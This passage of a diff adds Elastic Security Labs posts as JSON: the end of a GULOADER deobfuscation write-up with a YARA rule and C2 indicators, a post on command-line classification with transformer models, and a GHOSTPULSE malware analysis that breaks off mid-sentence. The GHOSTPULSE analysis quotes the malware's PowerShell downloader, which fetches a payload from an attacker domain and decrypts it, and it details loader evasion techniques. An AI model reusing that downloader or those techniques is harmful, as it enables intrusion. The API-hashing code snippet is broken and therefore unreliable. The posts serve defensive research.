program is run from user mode, it will trigger the exception due to incorrect permissions.\n\n\n\n\n\n### EXCEPTION_ILLEGAL_INSTRUCTION\n\nThis exception is invoked when a program attempts to execute an invalid or undefined CPU instruction. In our sample, when we run into Intel virtualization instructions such as `vmclear` or `vmxon`, this will trigger an exception. \n\n\n\n\nOnce an exception occurs, the GULOADER VEH code will first determine which exception code was responsible for the exception. In our sample, if the exception matches any of the five below, the code will take the same path regardless.\n\n* `EXCEPTION_ACCESS_VIOLATION` \n* `EXCEPTION_ILLEGAL_INSTRUCTION`\n* `EXCEPTION_PRIV_INSTRUCTION`\n* `EXCEPTION_SINGLE_STEP`\n* `EXCEPTION_BREAKPOINT`\n\nGULOADER will then check for any hardware breakpoints by walking the CONTEXT record found inside the **[EXCEPTION_POINTERS](https://learn.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-exception_pointers)** structure. If hardware breakpoints are found in the different debug registers, GULOADER will return a `0` into the CONTEXT record, which will end up causing the shellcode to crash.\n\n\n\n\nIf there are no hardware breakpoints, GULOADER will retrieve a single byte which is 7 bytes away from the address that caused the exception. When using the last example with `vmclear`, it would retrieve byte (`0x8A`).\n\n\n\n\nThen, using that byte, it will perform an XOR operation with a different hard-coded byte. In our case (`0xB8`), this is unique per sample. Now, with a derived offset `0x32` (`0xB8 ^ 0x8A`), GULOADER will modify the EIP address directly from the CONTEXT record by adding `0x32` to the previous address (`0x7697630`) that caused the exception resulting in the next code to execute from address (`0x7697662`).\n\n\n\n\nWith different junk instructions in between, and repeatedly hitting exceptions (we counted 229 unique exceptions in our sample), it’s not hard to see why this can break different tooling and increase analyst time.\n\n## Control Flow Cleaning\n\nTo make following the control flow easier, an analyst can bypass the VEH by tracing the execution, logging the exceptions, and patching the shellcode using the previously discussed EIP modification algorithm. For this procedure, we leveraged [TinyTracer](https://github.com/hasherezade/tiny_tracer), a tool written by [@hasherezade](https://twitter.com/hasherezade) that leverages [Pin](https://www.intel.com/content/www/us/en/developer/articles/tool/pin-a-dynamic-binary-instrumentation-tool.html), a dynamic binary instrumentation framework. This will allow us to catch the different addresses that triggered the exception, so using the example above with `vmclear`, we can see the address was `0x7697630`, generated an exception calling `KiUserExceptionDispatcher`, a function responsible for handling user-mode exceptions. \n\nOnce all the exceptions are collected and filtered, these can be passed into an IDAPython script where we walk through each address, calculate the offset using the 7th byte over and XOR key (`0xB8`), then patch out all the instructions generating exceptions with short jumps. \n\nThe following image is an example of patching instructions that trigger exceptions at addresses `0x07697630` and `0x0769766C`. \n\n\n\n \nBelow is a graphic representing the control flow graph before the patching is applied globally. Our basic block with the `vmclear` instruction is highlighted in orange. By implementing the VEH, GULOADER flattens the control flow graph, making it harder to trace the program logic. \n\n\n\n\nAfter patching the VEH with `jmp` instructions, this transforms the basic blocks by connecting them together, reducing the complexity behind the flow of the shellcode.\n\n\n\n\nUsing this technique can accelerate the cleaning process, yet it’s important to note that it isn’t a bulletproof method. In this instance, there still ends up being a good amount of code/functionality that will still need to be analyzed, but this definitely goes a long way in simplifying the code by removing the VEH. The full POC script is located [here](https://github.com/elastic/labs-releases/tree/main/tools/guloader/guloader_FixCFG.py).\n\n## Conclusion\n\nGULOADER has many different features that can break disassembly, hinder control flow, and make analysis difficult for researchers. Despite this and the process being imperfect, we can counter these traits through different static or dynamic processes to help reduce the analysis time. For example, we observed that with new exceptions in the VEH, we can still trace through them and patch the shellcode. This process will set the analyst on the right path, closer to accessing the core functionality with GULOADER. \n\nBy sharing some of our workflow, we hope to provide multiple takeaways if you encounter GULOADER in the wild. Based on GULOADER’s changes, it's highly likely that future behaviors will require new and different strategies. For detecting GULOADER, the following section includes YARA rules, and the IDAPython script from this post can be found [here](https://github.com/elastic/labs-releases/tree/main/tools/guloader/guloader_FixCFG.py). For new updates on the latest threat research, check out our [malware analysis section](https://www.elastic.co/security-labs/topics/malware-analysis) by the Elastic Security Labs team. \n\n## YARA\n\nElastic Security has created different YARA [rules](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Guloader.yar) to identify this activity. Below is an example of one YARA rule to identify GULOADER. \n\n```\nrule Windows_Trojan_Guloader {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2023-10-30\"\n last_modified = \"2023-11-02\" \n reference_sample = \"6ae7089aa6beaa09b1c3aa3ecf28a884d8ca84f780aab39902223721493b1f99\"\n severity = 100\n arch = \"x86\"\n threat_name = \"Windows.Trojan.Guloader\"\n license = \"Elastic License v2\"\n os = \"windows\"\n strings:\n $djb2_str_compare = { 83 C0 08 83 3C 04 00 0F 84 [4] 39 14 04 75 }\n $check_exception = { 8B 45 ?? 8B 00 38 EC 8B 58 ?? 84 FD 81 38 05 00 00 C0 }\n $parse_mem = { 18 00 10 00 00 83 C0 18 50 83 E8 04 81 00 00 10 00 00 50 }\n $hw_bp = { 39 48 0C 0F 85 [4] 39 48 10 0F 85 [4] 39 48 14 0F 85 [7] 39 48 18 }\n $scan_protection = { 39 ?? 14 8B [5] 0F 84 }\n condition:\n 2 of them\n}\n```\n\n## Observations\n \nAll observables are also available for [download](https://github.com/elastic/labs-releases/tree/main/indicators/guloader) in both ECS and STIX format.\n\nThe following observables were discussed in this research.\n\n| Observable | Type | Name | Reference |\n|------------------------------------------------------------------|-----------|-------------------------|--------------------------|\n| 6ae7089aa6beaa09b1c3aa3ecf28a884d8ca84f780aab39902223721493b1f99 | SHA-256 | Windows.Trojan.Guloader | GULOADER downloader |\n| 101.99.75[.]183/MfoGYZkxZIl205.bin | url | NA | GULOADER C2 URL |\n| 101.99.75[.]183 | ipv4-addr | NA | GULOADER C2 IP |\n\n## References\n\n* [https://github.com/elastic/labs-releases/tree/main/tools/guloader](https://github.com/elastic/labs-releases/tree/main/tools/guloader) \n* [https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye](https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye)"
+ },
+ "title": "Getting gooey with GULOADER: deobfuscating the downloader",
+ "slug": "getting-gooey-with-guloader-downloader",
+ "date": "2023-12-06",
+ "description": "Elastic Security Labs walks through the updated GULOADER analysis countermeasures.",
+ "author": [
+ {
+ "slug": "daniel-stepanic"
+ }
+ ],
+ "image": "photo-edited-03@2x.jpg",
+ "category": [
+ {
+ "slug": "malware-analysis"
+ }
+ ],
+ "tags": [
+ "guloader",
+ "cloudeye",
+ "Vectored Exception handler"
+ ]
+ },
+ "id": "security_labs_content-getting_gooey_with_guloader_downloader-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-getting_the_most_out_of_transforms_in_elastic-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-getting_the_most_out_of_transforms_in_elastic-md.json
new file mode 100644
index 00000000000..1697773715e
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-getting_the_most_out_of_transforms_in_elastic-md.json
@@ -0,0 +1,33 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Getting the Most Out of Transformers in Elastic\"\nslug: \"getting-the-most-out-of-transforms-in-elastic\"\ndate: \"2022-08-23\"\ndescription: \"In this blog, we will briefly talk about how we fine-tuned a transformer model meant for a masked language modeling (MLM) task, to make it suitable for a classification task.\"\nauthor:\n - slug: apoorva-joshi\n - slug: thomas-veasey\n - slug: benjamin-trent\nimage: \"machine-learning-1200x628px-2021-notext.jpg\"\ncategory:\n - slug: security-research\ntags:\n - machine learning\n---\n\n## Preamble\n\nIn 8.3, our Elastic Stack Machine Learning team introduced a way to import [third party Natural Language Processing (NLP) models](https://www.elastic.co/guide/en/machine-learning/master/ml-nlp-model-ref.html) into Elastic. As security researchers, we HAD to try it out on a security dataset. So we decided to build a model to identify malicious command lines by fine-tuning a pre-existing model available on the [Hugging Face model hub](https://huggingface.co/models).\n\nUpon finding that the fine-tuned model was performing (surprisingly!) well, we wanted to see if it could replace or be combined with our previous [tree-based model](https://www.elastic.co/blog/problemchild-detecting-living-off-the-land-attacks) for detecting Living off the Land (LotL) attacks. But first, we had to make sure that the throughput and latency of this new model were reasonable enough for real-time inference. This resulted in a series of experiments, the results of which we will detail in this blog.\n\nIn this blog, we will briefly talk about how we fine-tuned a transformer model meant for a masked language modeling (MLM) task, to make it suitable for a classification task. We will also look at how to import custom models into Elastic. Finally, we’ll dive into all the experiments we did around using the fine-tuned model for real-time inference.\n\n## NLP for command line classification\n\nBefore you start building NLP models, it is important to understand whether an [NLP](https://www.ibm.com/cloud/learn/natural-language-processing) model is even suitable for the task at hand. In our case, we wanted to classify command lines as being malicious or benign. Command lines are a set of commands provided by a user via the computer terminal. An example command line is as follows:\n\n```\n**move test.txt C:\\**\n```\n\nThe above command moves the file **test.txt** to the root of the \\*\\*C:\\*\\* directory.\n\nArguments in command lines are related in the way that the co-occurrence of certain values can be indicative of malicious activity. NLP models are worth exploring here since these models are designed to understand and interpret relationships in natural (human) language, and since command lines often use some natural language.\n\n## Fine-tuning a Hugging Face model\n\nHugging Face is a data science platform that provides tools for machine learning (ML) enthusiasts to build, train, and deploy ML models using open source code and technologies. Its model hub has a wealth of models, trained for a variety of NLP tasks. You can either use these pre-trained models as-is to make predictions on your data, or fine-tune the models on datasets specific to your [NLP](https://www.ibm.com/cloud/learn/natural-language-processing) tasks.\n\nThe first step in fine-tuning is to instantiate a model with the model configuration and pre-trained weights of a specific model. Random weights are assigned to any task-specific layers that might not be present in the base model. Once initialized, the model can be trained to learn the weights of the task-specific layers, thus fine-tuning it for your task. Hugging Face has a method called [from_pretrained](https://huggingface.co/docs/transformers/v4.21.1/en/main_classes/model#transformers.PreTrainedModel.from_pretrained) that allows you to instantiate a model from a pre-trained model configuration.\n\nFor our command line classification model, we created a [RoBERTa](https://huggingface.co/docs/transformers/model_doc/roberta) model instance with encoder weights copied from the [roberta-base](https://huggingface.co/roberta-base) model, and a randomly initialized sequence classification head on top of the encoder:\n\n**model = RobertaForSequenceClassification.from_pretrained('roberta-base', num_labels=2)**\n\nHugging Face comes equipped with a [Tokenizers](https://huggingface.co/docs/transformers/v4.21.0/en/main_classes/tokenizer) library consisting of some of today's most used tokenizers. For our model, we used the [RobertaTokenizer](https://huggingface.co/docs/transformers/model_doc/roberta#transformers.RobertaTokenizer) which uses [Byte Pair Encoding](https://en.wikipedia.org/wiki/Byte_pair_encoding) (BPE) to create tokens. This tokenization scheme is well-suited for data belonging to a different domain (command lines) from that of the tokenization corpus (English text). A code snippet of how we tokenized our dataset using **RobertaTokenizer** can be found [here](https://gist.github.com/ajosh0504/4560af91adb48212402300677cb65d4a#file-tokenize-py). We then used Hugging Face's [Trainer](https://huggingface.co/docs/transformers/v4.21.0/en/main_classes/trainer#transformers.Trainer) API to train the model, a code snippet of which can be found [here](https://gist.github.com/ajosh0504/4560af91adb48212402300677cb65d4a#file-train-py).\n\nML models do not understand raw text. Before using text data as inputs to a model, it needs to be converted into numbers. Tokenizers group large pieces of text into smaller semantically useful units, such as (but not limited to) words, characters, or subwords — called token —, which can, in turn, be converted into numbers using different encoding techniques.\n\n> - Check out [this](https://youtu.be/_BZearw7f0w) video (2:57 onwards) to review additional pre-processing steps that might be needed after tokenization based on your dataset.\n> - A complete tutorial on how to fine-tune pre-trained Hugging Face models can be found [here](https://huggingface.co/docs/transformers/training).\n\n## Importing custom models into Elastic\n\nOnce you have a trained model that you are happy with, it's time to import it into Elastic. This is done using [Eland](https://www.elastic.co/guide/en/elasticsearch/client/eland/current/machine-learning.html), a Python client and toolkit for machine learning in Elasticsearch. A code snippet of how we imported our model into Elastic using Eland can be found [here](https://gist.github.com/ajosh0504/4560af91adb48212402300677cb65d4a#file-import-py). \nYou can verify that the model has been imported successfully by navigating to **Model Management \\\\> Trained Models** via the Machine Learning UI in Kibana:\n\n\n\n## Using the Transformer model for inference — a series of experiments\n\nWe ran a series of experiments to evaluate whether or not our Transformer model could be used for real-time inference. For the experiments, we used a dataset consisting of ~66k command lines.\n\nOur first inference run with our fine-tuned **RoBERTa** model took ~4 hours on the test dataset. At the outset, this is much slower than the tree-based model that we were trying to beat at ~3 minutes for the entire dataset. It was clear that we needed to improve the throughput and latency of the PyTorch model to make it suitable for real-time inference, so we performed several experiments:\n\n### Using multiple nodes and threads\n\nThe latency numbers above were observed when the models were running on a single thread on a single node. If you have multiple Machine Learning (ML) nodes associated with your Elastic deployment, you can run inference on multiple nodes, and also on multiple threads on each node. This can significantly improve the throughput and latency of your models.\n\nYou can change these parameters while starting the trained model deployment via the [API](https://www.elastic.co/guide/en/elasticsearch/reference/master/start-trained-model-deployment.html):\n\n```\n**POST \\_ml/trained\\_models/\\\\/deployment/\\_start?number\\_of\\_allocations=2&threa ds\\_per\\_allocation=4**\n```\n\n**number_of_allocations** allows you to set the total number of allocations of a model across machine learning nodes and can be used to tune model throughput. **threads_per_allocation** allows you to set the number of threads used by each model allocation during inference and can be used to tune model latency. Refer to the [API documentation](https://www.elastic.co/guide/en/elasticsearch/reference/master/start-trained-model-deployment.html) for best practices around setting these parameters.\n\nIn our case, we set the **number_of_allocations** to **2** , as our cluster had two ML nodes and **threads_per_allocation** to **4** , as each node had four allocated processors.\n\nRunning inference using these settings **resulted in a 2.7x speedup** on the original inference time.\n\n### Dynamic quantization\n\nQuantizing is one of the most effective ways of improving model compute cost, while also reducing model size. The idea here is to use a reduced precision integer representation for the weights and/or activations. While there are a number of ways to trade off model accuracy for increased throughput during model development, [dynamic quantization](https://pytorch.org/tutorials/intermediate/dynamic_quantization_bert_tutorial.html) helps achieve a similar trade-off after the fact, thus saving on time and resources spent on iterating over the model training.\n\nEland provides a way to dynamically quantize your model before importing it into Elastic. To do this, simply pass in quantize=True as an argument while creating the TransformerModel object (refer to the code snippet for importing models) as follows:\n\n```\n**# Load the custom model**\n**tm = TransformerModel(\"model\", \"text\\_classification\", quantize=True)**\n```\n\nIn the case of our command line classification model, we observed the model size drop from 499 MB to 242 MB upon dynamic quantization. Running inference on our test dataset using this model **resulted in a 1.6x speedup** on the original inference time, for a slight drop in model [**sensitivity**](https://en.wikipedia.org/wiki/Sensitivity_and_specificity) (exact numbers in the following section) **.**\n\n### Knowledge Distillation\n\n[Knowledge Distillation](https://towardsdatascience.com/knowledge-distillation-simplified-dd4973dbc764) is a way to achieve model compression by transferring knowledge from a large (teacher) model to a smaller (student) one while maintaining validity. At a high level, this is done by using the outputs from the teacher model at every layer, to backpropagate error through the student model. This way, the student model learns to replicate the behavior of the teacher model. Model compression is achieved by reducing the number of parameters, which is directly related to the latency of the model.\n\nTo study the effect of knowledge distillation on the performance of our model, we fine-tuned a [distilroberta-base](https://huggingface.co/distilroberta-base) model (following the same procedure described in the fine-tuning section) for our command line classification task and imported it into Elastic. **distilroberta-base** has 82 million parameters, compared to its teacher model, **roberta-base** , which has 125 million parameters. The model size of the fine-tuned **DistilRoBERTa** model turned out to be **329** MB, down from **499** MB for the **RoBERTa** model.\n\nUpon running inference with this model, we **observed a 1.5x speedup** on the original inference time and slightly better model sensitivity (exact numbers in the following section) than the fine-tuned roberta-base model.\n\n### Dynamic quantization and knowledge distillation\n\nWe observed that dynamic quantization and model distillation both resulted in significant speedups on the original inference time. So, our final experiment involved running inference with a quantized version of the fine-tuned **DistilRoBERTa** model.\n\nWe found that this **resulted in a 2.6x speedup** on the original inference time, and slightly better model sensitivity (exact numbers in the following section). We also observed the model size drop from **329** MB to **199** MB after quantization.\n\n## Bringing it all together\n\nBased on our experiments, dynamic quantization and model distillation resulted in significant inference speedups. Combining these improvements with distributed and parallel computing, we were further able to **reduce the total inference time on our test set from four hours to 35 minutes**. However, even our fastest transformer model was still several magnitudes slower than the tree-based model, despite using significantly more CPU resources.\n\nThe Machine Learning team here at Elastic is introducing an inference caching mechanism in version 8.4 of the Elastic Stack, to save time spent on performing inference on repeat samples. These are a common occurrence in real-world environments, especially when it comes to Security. With this optimization in place, we are optimistic that we will be able to use transformer models alongside tree-based models in the future.\n\nA comparison of the sensitivity (true positive rate) and specificity (true negative rate) of our tree-based and transformer models shows that an ensemble of the two could potentially result in a more performant model:\n\n| | | | | |\n| ----------------------- | --------------- | ----------------------- | --------------- | ----------------------- |\n| Model | Sensitivity (%) | False Negative Rate (%) | Specificity (%) | False Positive Rate (%) |\n| Tree-based | 99.53 | 0.47 | 99.99 | 0.01 |\n| RoBERTa | 99.57 | 0.43 | 97.76 | 2.24 |\n| RoBERTa quantized | 99.56 | 0.44 | 97.64 | 2.36 |\n| DistilRoBERTa | 99.68 | 0.32 | 98.66 | 1.34 |\n| DistilRoBERTa quantized | 99.69 | 0.31 | 98.71 | 1.29 |\n\nAs seen above, the tree-based model is better suited for classifying benign data while the transformer model does better on malicious samples, so a weighted average or voting ensemble could work well to reduce the total error by averaging the predictions from both the models.\n\n## What's next\n\nWe plan to cover our findings from inference caching and model ensembling in a follow-up blog. Stay tuned!\n\nIn the meanwhile, we’d love to hear about models you're building for inference in Elastic. If you'd like to share what you're doing or run into any issues during the process, please reach out to us on our [community Slack channel](https://ela.st/slack)and [discussion forums](https://discuss.elastic.co/c/security). Happy experimenting!\n"
+ },
+ "title": "Getting the Most Out of Transformers in Elastic",
+ "slug": "getting-the-most-out-of-transforms-in-elastic",
+ "date": "2022-08-23",
+ "description": "In this blog, we will briefly talk about how we fine-tuned a transformer model meant for a masked language modeling (MLM) task, to make it suitable for a classification task.",
+ "author": [
+ {
+ "slug": "apoorva-joshi"
+ },
+ {
+ "slug": "thomas-veasey"
+ },
+ {
+ "slug": "benjamin-trent"
+ }
+ ],
+ "image": "machine-learning-1200x628px-2021-notext.jpg",
+ "category": [
+ {
+ "slug": "security-research"
+ }
+ ],
+ "tags": [
+ "machine learning"
+ ]
+ },
+ "id": "security_labs_content-getting_the_most_out_of_transforms_in_elastic-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-ghostpulse_haunts_victims_using_defense_evasion_bag_o_tricks-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-ghostpulse_haunts_victims_using_defense_evasion_bag_o_tricks-md.json
new file mode 100644
index 00000000000..2f444892325
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-ghostpulse_haunts_victims_using_defense_evasion_bag_o_tricks-md.json
@@ -0,0 +1,34 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"GHOSTPULSE haunts victims using defense evasion bag o' tricks\"\nslug: \"ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks\"\ndate: \"2023-10-27\"\ndescription: \"Elastic Security Labs reveals details of a new campaign leveraging defense evasion capabilities to infect victims with malicious MSIX executables.\"\nauthor:\n - slug: salim-bitam\n - slug: joe-desimone\nimage: \"photo-edited-05@2x.jpg\"\ncategory:\n - slug: attack-pattern\n - slug: malware-analysis\ntags:\n - ghostpulse\n - ref8207\n---\n\n## Update\n\nIn October 2024, we released an update to stage 2 of GHOSTPULSE that includes new evasion techniques. You can check it out [here](https://www.elastic.co/security-labs/tricks-and-treats).\n\n## Preamble\n\nElastic Security Labs has observed a campaign to compromise users with signed [MSIX](https://learn.microsoft.com/en-us/windows/msix/overview) application packages to gain initial access. The campaign leverages a stealthy loader we call GHOSTPULSE which decrypts and injects its final payload to evade detection.\n\nMSIX is a Windows app package format that developers can leverage to package, distribute, and install their applications to Windows users. With [App Installer](https://learn.microsoft.com/en-us/windows/msix/app-installer/app-installer-root), MSIX packages can be installed with a double click. This makes them a potential target for adversaries looking to compromise unsuspecting victims. However, MSIX requires access to purchased or stolen code signing certificates making them viable to groups of above-average resources.\n\nIn a common attack scenario, we suspect the users are directed to download malicious MSIX packages through [compromised websites](https://www.proofpoint.com/us/blog/threat-insight/are-you-sure-your-browser-date-current-landscape-fake-browser-updates), search-engine optimization (SEO) techniques, or malvertising. The masquerading themes we’ve observed include installers for Chrome, Brave, Edge, Grammarly, and WebEx to highlight a few.\n\n\n\nFrom the user's perspective, the “Install” button appears to function as intended. No pop-ups or warnings are presented. However, a PowerShell script is covertly used to download, decrypt, and execute GHOSTPULSE on the system. \n\n\n\n## Malware Analysis\n\nThe GHOSTPULSE loader can be broken down into 3 stages (sometimes preceded by a PowerShell script) used to execute a final payload.\n\n### Stage 0\n\nWe consider the PowerShell script dropped by the malicious MSIX installer to be the stage 0 payload. The PowerShell script is typically included in MSIX infection vectors, but not always in other GHOSTPULSE infection methods (MSI, EXE, ISO). In one sample, the PowerShell script downloads a GPG-encrypted file from `manojsinghnegi[.]com/2.tar.gpg`. \n\nNext, the PowerShell script decrypts the file using the command-line GPG utility using the following parameters:\n\n- `putin` - the passphrase for the GPG file\n- `--batch` - execute GPG in non-interactive mode\n- `--yes` - answer “yes” to any prompts\n- `--passphrase-fd 0` - read the passphrase from a file descriptor, 0 instructs GPG to use STDIN, which is putin\n- `--decrypt` - decrypt a file\n- `--output` - what to save the decrypted file as\n\n```\n# 1\n$url = \"https://manojsinghnegi[.]com/2.tar.gpg\"\n$outputPath = \"$env:APPDATA\\$xxx.gpg\"\nInvoke-WebRequest -Uri $url -OutFile $outputPath\n\n# 1\necho 'putin' | .$env:APPDATA\\gpg.exe --batch --yes --passphrase-fd 0 --decrypt --output $env:APPDATA\\$xxx.rar $env:APPDATA\\$xxx.gpg\n```\n\nThe GPG utility is included in the malicious MSIX installer package.\n\nThe decrypted file is a tar archive containing an executable `VBoxSVC.exe` which is in reality a renamed signed `gup.exe` executable that is used to update Notepad++, which is vulnerable to sideloading, an encrypted file in one example `handoff.wav` and a mostly benign library `libcurl.dll` with one of its functions overwritten with malicious code. The PowerShell executes the binary `VBoxSVC.exe` that will side load from the current directory the malicious DLL `libcurl.dll`. By minimizing the on-disk footprint of encrypted malicious code, the threat actor is able to evade file-based AV and ML scanning.\n\n\n\n### Stage 1\n\nThe first stage of GHOSTPULSE is embedded within a malicious DLL that undergoes side-loading through a benign executable. Execution of the corresponding code is triggered during the *DllEntryPoint* phase. \n\nThe process is initiated by pinpointing the base address of the malicious DLL of `libcurl.dll`, achieved through parsing the *InLoadOrderModuleList* API. This list, residing in the Process Environment Block (PEB), systematically records information about loaded modules.\n\n\n\nNext, GHOSTPULSE builds an Import Address Table (IAT) incorporating essential APIs. This operation involves parsing the *InLoadOrderModuleList* structure within the Process Environment Block (PEB).\n\n\n\n``` python\n# Python code used for API hashing\ndef calculate_api_name_hash(api_name):\n value = 0\n for char in input_string:\n total = (ord(char) + value *0x1003F)&0xFFFFFFFF\n return value \n```\n \nBelow is the Stage 1 IAT structure reconstructed from the GHOSTPULSE malware sample, provided for reference:\n\n``` c\nstruct core_stage1_IAT\n{\nvoid *kernel32_LoadLibraryW;\nvoid *kernel32_QueryPerformanceCounter;\nvoid *ntdll_module;\nvoid *kernel32_CloseHandle;\n__int64 field_20;\n__int64 field_28;\n__int64 field_30;\n__int64 field_38;\nvoid *kernel32_GetTempPathW;\nvoid *kernel32_GetModuleFileNameW;\n__int64 field_50;\n__int64 field_58;\n__int64 field_60;\nvoid *ntdll__swprintf;\n__int64 field_70;\n__int64 field_78;\n__int64 (__fastcall *ntdll_RtlDecompressBuffer)(__int64, __int64, _QWORD, __int64, int, int *);\nvoid *kernel32_CreateFileW;\nvoid *kernel32_ReadFile;\nvoid *ntdll_NtQueryInformationProcess;\nvoid *kernel32_GetFileSize;\n__int64 field_A8;\nvoid *kernel32_module;\n__int64 field_B8;\nvoid *ntdll_NtDelayExecution;\n__int64 (__fastcall *kernel32_GlobalAlloc)(__int64, __int64);\n__int64 field_D0;\nvoid *kernel32_GlobalFree;\n__int64 field_E0;\nvoid *ntdll_RtlQueryEnvironmentVariable_U;\n};\n```\n\nIt then proceeds with its operation by reading and parsing the file named `handoff.wav` from the current directory. This file contains an encrypted data blob divided into distinct chunks. Each chunk of data is positioned following the string IDAT. The parsing process involves the malware executing through two distinct steps.\n\n\n\nThe initial phase involves identifying the commencement of the encrypted data by searching for the IDAT string in the file, which is followed by a distinctive 4-byte tag value. If the tag corresponds to the value stored in the malware's configuration, the malware extracts the bytes of the encrypted blob. The initial structure is as follows:\n\n``` c\nstruct initial_idat_chunk\n{\n DWORD size_of_chunk;\n DWORD IDAT_string;\n DWORD tag;\n DWORD xor_key;\n DWORD size_of_encrypted_blob;\n _BYTE first_chunk[];\n};\n```\n \n- **size_of_chunk**: The malware utilizes this value, performing bits shifting to determine the chunk size to extract before the next occurrence of IDAT. \n- **xor_key**: A 4-byte long XOR key employed for decrypting the consolidated encrypted blob after extraction\n- **size_of_encrypted_blob**: Denotes the overall size of the encrypted blob, which is stored in chunks within the file \n- **first_chunk**: Marks the start of the first chunk of data in memory\n \n\n\nIn the second step, the malware locates the next occurrence of IDAT and proceeds to extract the encrypted chunks that follow it which has the following format: \n\n``` c\nstruct next_idat_chunk\n{\nDWORD size_of_chunk;\nDWORD IDAT_string;\n_BYTE n_chunk[];\n};\n```\n\n- **size_of_chunk**: The malware utilizes this value, performing bits shifting to determine the chunk size to extract before the next occurrence of IDAT. \n- **n_chunk**: Marks the start of the chunk of data in memory\n\nThe malware continues extracting encrypted data chunks until it reaches the specified size_of_encrypted_blob. Subsequently, the malware proceeds to decrypt the data using the 4-byte XOR key *xor_key*.\n\nAt this stage, the data blob, which is already compressed, undergoes decompression by the malware. The decompression process utilizes the `RtlDecompressBuffer` api.\n\n\n \nThe malware proceeds by loading a specified library stored in its configuration, in this case, `mshtml.dll`, utilizing the *LoadLibraryW* function. Shellcode (Stage 2) contained inside the decrypted and decompressed blob of data is written to the .text section of the freshly loaded DLL and then executed.\n\nThis technique is known as “module stomping”. The following image shows the associated *VirtualProtect* API calls captured with [Elastic Defend](https://www.elastic.co/guide/en/security/current/install-endpoint.html) associated with the module stomping:\n\n\n \n### Stage 2\n\nStage 2 initiates by constructing a new IAT structure and utilizing the CRC32 algorithm as the API name hashing mechanism.\nThe following is the IAT structure of stage 2:\n\n``` c\nstruct core_stage2_IAT\n{\n void *kernel32_module;\n void *ntdll_module;\n void *kernel32_CreateFileW;\n void *kernel32_WriteFile;\n void *kernel32_ReadFile;\n void *kernel32_SetFilePointer;\n void *kernel32_CloseHandle;\n void *kernel32_GlobalAlloc;\n void *kernel32_GlobalFree;\n void *kernel32_ExpandEnvironmentStringsW;\n void *kernel32_GetFileSize;\n void *kernel32_GetProcAddress;\n void *kernel32_LoadLibraryW;\n void *ntdll__swprintf;\n void *kernel32_QueryPerformanceCounter;\n void *ntdll_RtlDecompressBuffer;\n void *field_80;\n void *field_88;\n void *field_90;\n void *field_98;\n void *field_A0;\n void *ntdll_NtDelayExecution;\n void *ntdll_RtlRandom;\n void *kernel32_GetModuleFileNameW;\n void *kernel32_GetCommandLineW;\n void *field_C8;\n void *ntdll_sscanf;\n void *field_D8;\n void *ntdll_NtQueryInformationProcess;\n void *ntdll_NtQuerySystemInformation;\n void *kernel32_CreateDirectoryW;\n void *kernel32_CopyFileW;\n void *ntdll_NtClose;\n void *field_108;\n void *field_110;\n void *field_118;\n void *field_120;\n void *field_128;\n void *kernel32_SetCurrentDirectoryW;\n void *field_138;\n void *kernel32_SetEnvironmentVariableW;\n void *kernel32_CreateProcessW;\n void *kernel32_GetFileAttributesW;\n void *msvcrt_malloc;\n void *msvcrt_realloc;\n void *msvcrt_free;\n void *ntdll_RtlHashUnicodeString;\n void *field_178;\n void *field_180;\n void *kernel32_OpenMutexA;\n void *field_190;\n void *kernel32_VirtualProtect;\n void *kernel32_FlushInstructionCache;\n void *field_1A8;\n void *ntdll_NtOpenProcessToken;\n void *ntdll_NtQueryInformationToken;\n void *ntdll_RtlWalkFrameChain;\n void *field_1C8;\n void *addr_temp_file_content;\n void *addr_decrypted_file;\n};\n```\n\nConcerning NT functions, the malware reads the ntdll.dll library from disk and writes it to a dynamically allocated memory space with read, write, and execute permissions. Subsequently, it parses the loaded `ntdll.dll` library to extract the offsets of the required NT functions. These offsets are then stored within the newly built IAT structure. When the malware necessitates the execution of an NT API, it adds the API offset to the base address of `ntdll.dll` and directly invokes the API. Given that NT APIs operate at a very low level, they execute syscalls directly, which does not require the `ntdll.dll` library to be loaded in memory using the LoadLibrary API, this is done to evade userland hooks set by security products.\n\nThe following is the structure used by the malware to store NT API offsets:\n\n``` c\nstruct __unaligned __declspec(align(4)) core_stage2_nt_offsets_table\n{\n __int64 ntdll_module;\n int ZwCreateSection;\n int ZwMapViewOfSection;\n int ZwWriteVirtualMemory;\n int ZwProtectVirtualMemory;\n int NtSuspendThread;\n int ZwResumeThread;\n int ZwOpenProcess;\n int ZwGetContextThread;\n int NtSetContextThread;\n};\n```\n\nGHOSTPULSE has the ability to establish persistence, if configured to, by generating an `.lnk` file that points to the Stage 1 binary, denoted as `VBoxSVC.exe`. To achieve this, the malware leverages COM (Component Object Model) objects as part of its technique.\n\n\n \nIt extracts another sub-blob of data from the first decrypted blob of Stage 1. This data is located at a specific position in the structure. The malware then performs an XOR encryption on this sub-blob, using the result of the XOR operation between the CRC32 value of the machine's computer name and the constant value `0xA1B2D3B4`. Finally, the encrypted data is saved to a file in the user's temporary folder.\nIt extracts another sub-blob of data from the first decrypted blob of Stage 1. This data is located at a specific position in the structure. The malware then performs an XOR encryption on this sub-blob, using the result of the XOR operation between the CRC32 value of the machine's computer name and the constant value `0xA1B2D3B4`. Finally, the encrypted data is saved to a file in the user's temporary folder.\n\nThe malware then initiates a suspended child process using the executable specified in the Stage 2 configuration, which is a 32-bit `cmd.exe` in this case. It then adds an environment variable to the child process with a random name, example: `GFHZNIOWWLVYTESHRTGAVC`, pointing to the previously created temporary file. \n\nFurther, the malware proceeds by creating a section object and mapping a view of it to `mshtml.dll` in the child process using the `ZwCreateSection` and `ZwMapViewOfSection` APIs.\n\nThe legitimate `mshtml.dll` code is overwritten with the *WriteProcessMemory* API. The primary 